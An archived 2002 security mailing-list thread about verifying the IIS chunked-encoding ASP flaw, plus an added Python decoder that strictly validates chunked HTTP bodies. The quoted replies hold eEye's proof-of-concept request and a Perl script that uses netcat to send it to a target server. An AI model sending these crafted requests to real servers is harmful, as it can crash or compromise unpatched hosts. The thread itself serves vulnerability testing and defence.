Thanks, but I must have missed where the 100 continue return code was the
defining factor of vulnerability. I can get this to return, but I have no
way to verify vulnerability that I can see. The original description
released by Marc said that a popup appeared and that a message was
entered in the Application Event log. Since I can not reproduce either
of these symptoms, how do I verify vulnerability? If I send the same
data as below to a patched host, it still comes back with the 100
continue return code.

Oh, and on the lockup I mentioned before, I meant that the HTTP session
locked, not IIS itself. Not something I can count on, since it didn't
seem to happen every time and did not seem to produce any of the signs
noted in the advisory.

On Fri, 2002-04-12 at 12:52, damdum wrote:
> It should be noted that the request must be properly formatted (not sloppy),
> this means using CRLF not just LF. Here is a quick perl proggy:
>
> use IPC::Open2;
>
> $pid = open2(\*IN, \*OUT, "nc -nv 10.10.10.69 80");
>
> print OUT "POST /iisstart.asp HTTP/1.1\r\n".
> "Accept: */*\r\n".
> "Host: victom.com\r\n".
> "Content-Type: application/x-www-form-urlencoded\r\n".
> "Transfer-Encoding: chunked\r\n".
> "\r\n".
> "10\r\n".
> "PADPADPADPADPADP\r\n".
> "4\r\n".
> "DATA\r\n".
> "4\r\n".
> "DEST\r\n".
> "0\r\n";
>
> $buff = <IN>;
> if($buff =~ /HTTP\/1\.1 100 Continue/)
> {
> print "Got HTTP 100 Continue, sending returns...\n";
> sleep 1;
>
> print OUT "\r\n\r\n\r\n";
> print OUT "\r\n\r\n\r\n";
>
> print "Done\n";
> }
> else
> {
> print "Hrmm, didn't find HTTP 100 Continue, bye.\n";
> }
>
> close IN;
> close OUT;
>
>
> --
> damdum
>
>
> Quoting MadHat <madhatat_private>:
>
> > I have not been able to reproduce these results. I have managed to lock
> > up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup messages
> > appear and no entries in the Application Log. I have also been able to get
> > the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but
> > still no popup or messages.
> >
> > Is there a reliable way to scan for these vulnerabilities remotely?
> >
> > On Thu, 2002-04-11 at 11:25, Erik Parker wrote:
> > > JM> Anyone have a proof of concept for this exploit?
> > >
> > > eEye included some. Use this with "netcat" or "telnet"
> > >
> > > replace [enter] with an actual pressing of your enter key (look at the
> > > bottom, you can cut n paste)
> > >
> > > It should return something like this, if it worked (and generate a popup
> > > error to you that says "Unknown has generated errors")
> > >
> > > HTTP/1.1 100 Continue
> > > Server: Microsoft-IIS/5.0
> > > Date: Wed, 27 Mar 2002 23:37:32 GMT
> > >
> > > If it fails, it'll say something like:
> > >
> > > HTTP/1.1 500 Server Error
> > > Server: Microsoft-IIS/5.0
> > >
> > >
> > > The application log will say:
> > >
> > > Active Server Pages service has started
> > > Access performance data was denied to IWAM_netbiosname as attempted from
> > > c:\WINNT\SYSTEM32\Drwtsn32.exe
> > >
> > >
> > > **************Begin Session****************
> > > POST /iisstart.asp HTTP/1.1
> > > Accept: */*
> > > Host: eeye.com
> > > Content-Type: application/x-www-form-urlencoded
> > > Transfer-Encoding: chunked
> > >
> > > 10
> > > PADPADPADPADPADP
> > > 4
> > > DATA
> > > 4
> > > DEST
> > > 0
> > > [enter]
> > > [enter]
> > > **************End Session******************
> > >
> > >
> > --
> > MadHat at Unspecific.com
> > gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
> > Key fingerprint = E786 7B30 7534 DCC2 94D5 91DE E922 0B21 9DDC 3E98
> >
>
>
--
MadHat at Unspecific.com
gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
Key fingerprint = E786 7B30 7534 DCC2 94D5 91DE E922 0B21 9DDC 3E98
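The thread above turns on how a chunked transfer-encoded body is framed: damdum notes the request only behaves as described when every line ends in CRLF, and the eEye session shows hex chunk sizes that must agree with the data that follows. The following Python decoder is an added example, not code from the thread or from eEye's advisory; it shows the checks a strict chunked-body parser performs (CRLF-only framing, chunk size matching the data present, a hard cap on the declared size, a mandatory terminator) and runs them over a body constructed from the request quoted above plus a few malformed variants. The function names, the `example.invalid` host and the 1 MiB body cap are my own assumptions.

```python
"""Strict decoder for HTTP/1.1 chunked transfer-encoding bodies (added example)."""
import re

# Assumed limits for this example: at most 8 hex digits per chunk-size and a
# 1 MiB cap on the decoded body, so a declared size can never drive allocation.
MAX_BODY = 1 << 20

# chunk-size [ ";" chunk-ext ] CRLF  -- CRLF is mandatory, a bare LF does not match
CHUNK_LINE = re.compile(rb"([0-9A-Fa-f]{1,8})(?:;[^\r\n]*)?\r\n")


class ChunkedError(ValueError):
    """Raised on any framing violation; the partially decoded body must not be used."""


def decode_chunked(raw: bytes, max_body: int = MAX_BODY) -> bytes:
    """Decode a chunked body, enforcing CRLF framing, size/data agreement and a total cap."""
    out = bytearray()
    pos = 0
    while True:
        m = CHUNK_LINE.match(raw, pos)          # match() anchors at pos, so no '^' needed
        if m is None:
            raise ChunkedError(f"malformed chunk-size line at offset {pos}")
        size = int(m.group(1), 16)
        pos = m.end()
        if size == 0:
            break                                # last-chunk reached
        if len(out) + size > max_body:
            raise ChunkedError(f"declared chunk size {size} exceeds body cap")
        end = pos + size
        # The data must be fully present AND followed by CRLF. If the slice is
        # short (truncated body) or the bytes at `end` are not CRLF, the declared
        # size and the actual data disagree, which is exactly what a sloppy parser
        # that trusts the size field never notices.
        if raw[end:end + 2] != b"\r\n":
            raise ChunkedError(f"chunk at offset {pos} is not {size} bytes followed by CRLF")
        out += raw[pos:end]
        pos = end + 2
    # After the last-chunk: optional trailer lines, then one empty line.
    while True:
        nl = raw.find(b"\r\n", pos)
        if nl < 0:
            raise ChunkedError("missing terminating CRLF after last chunk")
        line, pos = raw[pos:nl], nl + 2
        if line == b"":
            break
        if b"\n" in line or b":" not in line:
            raise ChunkedError("malformed trailer line")
    if pos != len(raw):
        raise ChunkedError(f"{len(raw) - pos} trailing bytes after end of body")
    return bytes(out)


def is_well_formed(raw: bytes) -> bool:
    """True only when the body decodes with every framing check satisfied."""
    try:
        decode_chunked(raw)
        return True
    except ChunkedError:
        return False


def body_of(request: bytes) -> bytes:
    """Split the body off a raw HTTP request (headers end at the first blank line)."""
    _head, sep, body = request.partition(b"\r\n\r\n")
    if not sep:
        raise ChunkedError("request has no header/body separator")
    return body


# Constructed sample: the request quoted in the thread, host replaced with a
# placeholder, with the two trailing newlines the eEye session shows after "0".
SAMPLE_REQUEST = (
    b"POST /iisstart.asp HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Host: example.invalid\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"10\r\nPADPADPADPADPADP\r\n"
    b"4\r\nDATA\r\n"
    b"4\r\nDEST\r\n"
    b"0\r\n\r\n"
)

if __name__ == "__main__":
    body = body_of(SAMPLE_REQUEST)
    print("decoded:", decode_chunked(body))
    for label, bad in [
        ("bare LF framing", body.replace(b"\r\n", b"\n")),
        ("size/data mismatch", b"5\r\nDATA\r\n0\r\n\r\n"),
        ("huge declared size", b"FFFFFFFF\r\nDATA\r\n0\r\n\r\n"),
        ("missing terminator", b"4\r\nDATA\r\n0\r\n"),
    ]:
        print(f"{label}: {'accepted' if is_well_formed(bad) else 'rejected'}")
```

The well-formed sample decodes to the 24 bytes `PADPADPADPADPADPDATADEST`; each malformed variant is rejected before any of its data is copied. Note that whether a server answers `100 Continue` says nothing about how it later handles the chunk sizes, which is why the thread's participants could get that response from patched and unpatched hosts alike.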
This archive was generated by hypermail 2b30 : Fri Apr 12 2002 - 14:13:02 PDT